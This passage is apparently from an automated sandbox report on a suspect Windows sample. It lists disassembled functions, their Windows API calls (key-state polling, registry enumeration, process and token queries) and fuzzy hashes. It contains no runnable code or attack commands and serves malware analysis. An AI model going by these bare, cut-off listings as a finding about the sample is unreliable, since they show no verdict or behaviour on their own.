                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharUpper
                                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                  • API String ID: 3964851224-769500911
                                                                  • Opcode ID: 883fa64cf448764feabee0d9372d2a362f3309a4e41520e16d879616a9a5ff60
                                                                  • Instruction ID: 518267c66d68a28b1c2b2255de9244a2abe2018aa223fc2b20f960cc6db897c6
                                                                  • Opcode Fuzzy Hash: 883fa64cf448764feabee0d9372d2a362f3309a4e41520e16d879616a9a5ff60
                                                                  • Instruction Fuzzy Hash: F9115E31A102088FCF00EFA4E955AFEB7B4FF66304B1084A5EC14A7695EB329D4ACB50
                                                                  APIs
                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0096EC07
                                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0096EC37
                                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0096ED6A
                                                                  • CloseHandle.KERNEL32(?), ref: 0096EDEB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                  • String ID:
                                                                  • API String ID: 2364364464-0
                                                                  • Opcode ID: 4d540990521f9b2e9f1d30d44edcecd30b5a258569a8558aab2a18ccd0adfc5c
                                                                  • Instruction ID: c61ce20c484c4df94ed3ad1c2d6dcb7d6a9cea9f2dd4a7f4ca01f9aa7df29f42
                                                                  • Opcode Fuzzy Hash: 4d540990521f9b2e9f1d30d44edcecd30b5a258569a8558aab2a18ccd0adfc5c
                                                                  • Instruction Fuzzy Hash: CA814D756047009FDB60EF29C896F2AB7E5EF44750F14882DFA99DB2D2DB70AC408B52
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                  • String ID:
                                                                  • API String ID: 1559183368-0
                                                                  • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                  • Instruction ID: e853409cb2d589e416a5b6983b707bbd45ac823cf604ce152cae979b68f72259
                                                                  • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                                  • Instruction Fuzzy Hash: 86517170B00B0DDBDB249E69D8806EE77ABAFC1321F278729F825962D1D7749DD09B40
                                                                  APIs
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 00970E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0096FDAD,?,?), ref: 00970E31
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009700FD
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0097013C
                                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00970183
                                                                  • RegCloseKey.ADVAPI32(?,?), ref: 009701AF
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 009701BC
                                                                  Similarity
                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                  • String ID:
                                                                  • API String ID: 3440857362-0
                                                                  APIs
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0096D927
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0096D9AA
                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0096D9C6
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0096DA07
                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0096DA21
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00957896,?,?,00000000), ref: 008F5A2C
                                                                    • Part of subcall function 008F5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00957896,?,?,00000000,?,?), ref: 008F5A50
                                                                  Similarity
                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 327935632-0
                                                                  APIs
                                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0095E61F
                                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0095E648
                                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0095E687
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0095E6AC
                                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0095E6B4
                                                                  Similarity
                                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                  • String ID:
                                                                  • API String ID: 1389676194-0
                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 008F2357
                                                                  • ScreenToClient.USER32(009B57B0,?), ref: 008F2374
                                                                  • GetAsyncKeyState.USER32(00000001), ref: 008F2399
                                                                  • GetAsyncKeyState.USER32(00000002), ref: 008F23A7
                                                                  Similarity
                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                  • String ID:
                                                                  • API String ID: 4210589936-0
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009463E7
                                                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 00946433
                                                                  • TranslateMessage.USER32(?), ref: 0094645C
                                                                  • DispatchMessageW.USER32(?), ref: 00946466
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00946475
                                                                  Similarity
                                                                  • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                  • String ID:
                                                                  • API String ID: 2108273632-0
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 00948A30
                                                                  • PostMessageW.USER32(?,00000201,00000001), ref: 00948ADA
                                                                  • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00948AE2
                                                                  • PostMessageW.USER32(?,00000202,00000000), ref: 00948AF0
                                                                  • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00948AF8
                                                                  Similarity
                                                                  • API ID: MessagePostSleep$RectWindow
                                                                  • String ID:
                                                                  • API String ID: 3382505437-0
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0094B204
                                                                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0094B221
                                                                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0094B259
                                                                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0094B27F
                                                                  • _wcsstr.LIBCMT ref: 0094B289
                                                                  Similarity
                                                                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                  • String ID:
                                                                  • API String ID: 3902887630-0
                                                                  APIs
                                                                    • Part of subcall function 008F2612: GetWindowLongW.USER32(?,000000EB), ref: 008F2623
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0097B192
                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0097B1B7
                                                                  • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0097B1CF
                                                                  • GetSystemMetrics.USER32(00000004), ref: 0097B1F8
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00960E90,00000000), ref: 0097B216
                                                                  Similarity
                                                                  • API ID: Window$Long$MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 2294984445-0
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00949320
                                                                    • Part of subcall function 008F7BCC: _memmove.LIBCMT ref: 008F7C06
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00949352
                                                                  • __itow.LIBCMT ref: 0094936A
                                                                  • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00949392
                                                                  • __itow.LIBCMT ref: 009493A3
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow$_memmove
                                                                  • String ID:
                                                                  • API String ID: 2983881199-0
                                                                  APIs
                                                                  • IsWindow.USER32(00000000), ref: 00965A6E
                                                                  • GetForegroundWindow.USER32 ref: 00965A85
                                                                  • GetDC.USER32(00000000), ref: 00965AC1
                                                                  • GetPixel.GDI32(00000000,?,00000003), ref: 00965ACD
                                                                  • ReleaseDC.USER32(00000000,00000003), ref: 00965B08
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ForegroundPixelRelease
                                                                  • String ID:
                                                                  • API String ID: 4156661090-0
                                                                  • Opcode ID: 3b44c0a39e74ed9d73a68ad32b3406ea28ac5e96c969c934b54290ac365b3bfc
                                                                  • Instruction ID: 87ab7ea8b94bb109ea59b032131ae21e757e0f376dbd24c95c7df8ee7405f151
                                                                  • Opcode Fuzzy Hash: 3b44c0a39e74ed9d73a68ad32b3406ea28ac5e96c969c934b54290ac365b3bfc
                                                                  • Instruction Fuzzy Hash: 73218436A04108AFDB14EFA9DC98A6AB7E5EF48350F148479F949D7351CA30AD44DB50
                                                                  APIs
                                                                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 008F134D
                                                                  • SelectObject.GDI32(?,00000000), ref: 008F135C
                                                                  • BeginPath.GDI32(?), ref: 008F1373
                                                                  • SelectObject.GDI32(?,00000000), ref: 008F139C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$BeginCreatePath
                                                                  • String ID:
                                                                  • API String ID: 3225163088-0
                                                                  • Opcode ID: 393391f4402f48eb4d848999060398ea7f712ea45ac3eefa0022e4935a0107fa
                                                                  • Instruction ID: 8817f4ee7c92ad8434d042e310d870ca3504a53da52e24c6c098387ef64c737a
                                                                  • Opcode Fuzzy Hash: 393391f4402f48eb4d848999060398ea7f712ea45ac3eefa0022e4935a0107fa
                                                                  • Instruction Fuzzy Hash: D0218C31828608EBDF119F25EE087697BA8FB00331F15432AE914E62B0D7759891EF90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID:
                                                                  • API String ID: 2931989736-0
                                                                  • Opcode ID: 66fe2dfb352457cf4cec2ed16a2b3e7990a19a3f2737ef626ea6dfda89cfd0a1
                                                                  • Instruction ID: 8beac3f90c9aba77e944d80b930b995cc3875a851ef99d2282c0abcea7d5fb39
                                                                  • Opcode Fuzzy Hash: 66fe2dfb352457cf4cec2ed16a2b3e7990a19a3f2737ef626ea6dfda89cfd0a1
                                                                  • Instruction Fuzzy Hash: 7301B1B27001097BD2046B15ADD2FFBB76CDEA178CF044426FE4596382EB64EE1182A0
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00954ABA
                                                                  • __beginthreadex.LIBCMT ref: 00954AD8
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00954AED
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00954B03
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00954B0A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                  • String ID:
                                                                  • API String ID: 3824534824-0
                                                                  • Opcode ID: 32517517c066fbdd912613c46464d6b8d75ae9a8f5953581233e24a9977dc325
                                                                  • Instruction ID: f19d2670126b29dd2684183eb52d11e3f137663bb724600725bc52d3840b1136
                                                                  • Opcode Fuzzy Hash: 32517517c066fbdd912613c46464d6b8d75ae9a8f5953581233e24a9977dc325
                                                                  • Instruction Fuzzy Hash: F211047691D608BBC740CFA9AC08B9F7FACEB45325F144369FC28E3250D671C98497A0
                                                                  APIs
                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0094821E
                                                                  • GetLastError.KERNEL32(?,00947CE2,?,?,?), ref: 00948228
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00947CE2,?,?,?), ref: 00948237
                                                                  • HeapAlloc.KERNEL32(00000000,?,00947CE2,?,?,?), ref: 0094823E
                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00948255
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 842720411-0
                                                                  • Opcode ID: 8cae5e5579cf3a1ea01510e775bc02f2bcd7c896f57acbc21d07f53e339a55a5
                                                                  • Instruction ID: 6641502e11197b0ade7627b98993f30f38b3c2ae10232d7f27923419408defea
                                                                  • Opcode Fuzzy Hash: 8cae5e5579cf3a1ea01510e775bc02f2bcd7c896f57acbc21d07f53e339a55a5
                                                                  • Instruction Fuzzy Hash: 44016DB2218608BFDB204FA5DC58D6B7BACEF8A794B500429F819E2220DA718C40DA70
                                                                  APIs
                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?,?,00947455), ref: 00947127
                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 00947142
                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 00947150
                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?), ref: 00947160
                                                                  • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00947044,80070057,?,?), ref: 0094716C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                  • String ID:
                                                                  • API String ID: 3897988419-0
                                                                  • Opcode ID: 3aa03bcbc69785524f994911b304a1f9be1f291aa975fe04c4c4471255c23674
                                                                  • Instruction ID: f9fb4840058742ed98a1c933716e0267ae6192b218b156e149a457a18cf84fe6
                                                                  • Opcode Fuzzy Hash: 3aa03bcbc69785524f994911b304a1f9be1f291aa975fe04c4c4471255c23674
                                                                  • Instruction Fuzzy Hash: F3018F73619208BBDB114FA4DC44FAEBBADEF48791F140064FD09E2220D731DD80ABA0
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00955260
                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0095526E
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00955276
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00955280
                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009552BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                  • String ID:
                                                                  • API String ID: 2833360925-0
                                                                  • Opcode ID: 900682cdcc4b33be0b5066d11039f8fe869ac910bbf2e60011964cab867e74b0
                                                                  • Instruction ID: dce8f12a426689a4933a5d886642bb1225ab3f556abb97c4ee8126224ae58544
                                                                  • Opcode Fuzzy Hash: 900682cdcc4b33be0b5066d11039f8fe869ac910bbf2e60011964cab867e74b0
                                                                  • Instruction Fuzzy Hash: 2E015B32D19A1DDBCF00DFE5E8689EDBB78BB08722F410456E955F2141CB305558DBA1
                                                                  APIs
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00948121
                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0094812B
                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0094813A
                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00948141
                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00948157
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                  • String ID:
                                                                  • API String ID: 44706859-0
                                                                  • Opcode ID: 77e5d595b40604da0303d2d55d84d0bef48579b92a1b8828fee9f5471010e426
                                                                  • Instruction ID: 59459253eb52dda562a3d2f5bba46ac4ae4126c40eb698d01a3d4a7610f12fed
                                                                  • Opcode Fuzzy Hash: 77e5d595b40604da0303d2d55d84d0bef48579b92a1b8828fee9f5471010e426
                                                                  • Instruction Fuzzy Hash: 54F062B2218304EFEB110FA5EC98E7B3BACFF89754F000026F949E6150CB619D81EA70
                                                                  APIs
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0094C1F7
                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0094C20E
                                                                  • MessageBeep.USER32(00000000), ref: 0094C226
                                                                  • KillTimer.USER32(?,0000040A), ref: 0094C242
                                                                  • EndDialog.USER32(?,00000001), ref: 0094C25C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                  • String ID:
                                                                  • API String ID: 3741023627-0
                                                                  • Opcode ID: 2058f319e1a195700f2e9541282242c4102ffc302f038a2725f9d620535a0eb0
                                                                  • Instruction ID: 8620d259e8e8d66351c24ce359995a31974ff461b4bcab9f2608e3a70ea310e9
                                                                  • Opcode Fuzzy Hash: 2058f319e1a195700f2e9541282242c4102ffc302f038a2725f9d620535a0eb0
                                                                  • Instruction Fuzzy Hash: DE012671518308ABEB205B60EC4EFA677BCFF00B02F000669F556A00E0CBF4A8849B80
                                                                  APIs
                                                                  • EndPath.GDI32(?), ref: 008F13BF
                                                                  • StrokeAndFillPath.GDI32(?,?,0092B888,00000000,?), ref: 008F13DB
                                                                  • SelectObject.GDI32(?,00000000), ref: 008F13EE
                                                                  • DeleteObject.GDI32 ref: 008F1401
                                                                  • StrokePath.GDI32(?), ref: 008F141C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmp
                                                                   • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                  • String ID:
                                                                  • API String ID: 2625713937-0
                                                                  • Opcode ID: 38f8a81a314bb5167621d10ea5252734670af3a589417c6e89675170e683c615
                                                                  • Instruction ID: 772f7ebcfc0c644f761bbd172413440edd6338b2bf452c89f0c71205bbf0a6e3
                                                                  • Opcode Fuzzy Hash: 38f8a81a314bb5167621d10ea5252734670af3a589417c6e89675170e683c615
                                                                  • Instruction Fuzzy Hash: 7EF01431028A08EBDB126F26EE5C7683BA5FB01336F098324E52DA81F1C7348995EF10
                                                                  APIs
                                                                    • Part of subcall function 00910DB6: std::exception::exception.LIBCMT ref: 00910DEC
                                                                    • Part of subcall function 00910DB6: __CxxThrowException@8.LIBCMT ref: 00910E01
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                    • Part of subcall function 008F7A51: _memmove.LIBCMT ref: 008F7AAB
                                                                  • __swprintf.LIBCMT ref: 00902ECD
                                                                  Strings
                                                                  • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00902D66
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                   • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmp
